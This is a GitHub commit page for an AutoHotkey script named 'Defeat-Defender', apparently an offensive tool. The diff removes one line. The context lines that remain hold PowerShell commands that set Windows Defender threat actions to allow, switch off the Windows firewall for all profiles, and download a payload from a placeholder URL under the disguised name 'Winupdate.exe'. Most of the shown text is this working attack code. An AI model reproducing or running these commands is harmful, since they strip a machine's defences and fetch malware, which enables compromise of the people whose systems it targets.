Skip to content

Commit

Permalink
Update Defeat-Defender-V1.3.ahk
Browse files Browse the repository at this point in the history
  • Loading branch information
swagkarna authored Sep 17, 2021
1 parent 14134ef commit 88961e3
Showing 1 changed file with 0 additions and 1 deletion.
1 change: 0 additions & 1 deletion Defeat-Defender[AHK]/Defeat-Defender-V1.3.ahk
Original file line number Diff line number Diff line change
Expand Up @@ -32,7 +32,6 @@ j:="powershell.exe -command ""Set-MpPreference -HighThreatDefaultAction 6 -Force
k:="powershell.exe -command ""Set-MpPreference -ModerateThreatDefaultAction 6""`n"
l:="powershell.exe -command ""Set-MpPreference -LowThreatDefaultAction 6""`n"
m:="powershell.exe -command ""Set-MpPreference -SevereThreatDefaultAction 6""`n"
n:="powershell.exe -command ""Set-MpPreference -ScanScheduleDay 8""`n"
o:="powershell.exe -command ""netsh advfirewall set allprofiles state off""`n"
ff:="powershell -command start-bitstransfer https://directurl-to-your-payload .\Winupdate.exe `n"
gg:="timeout 3 `n"
Expand Down

0 comments on commit 88961e3

Please sign in to comment.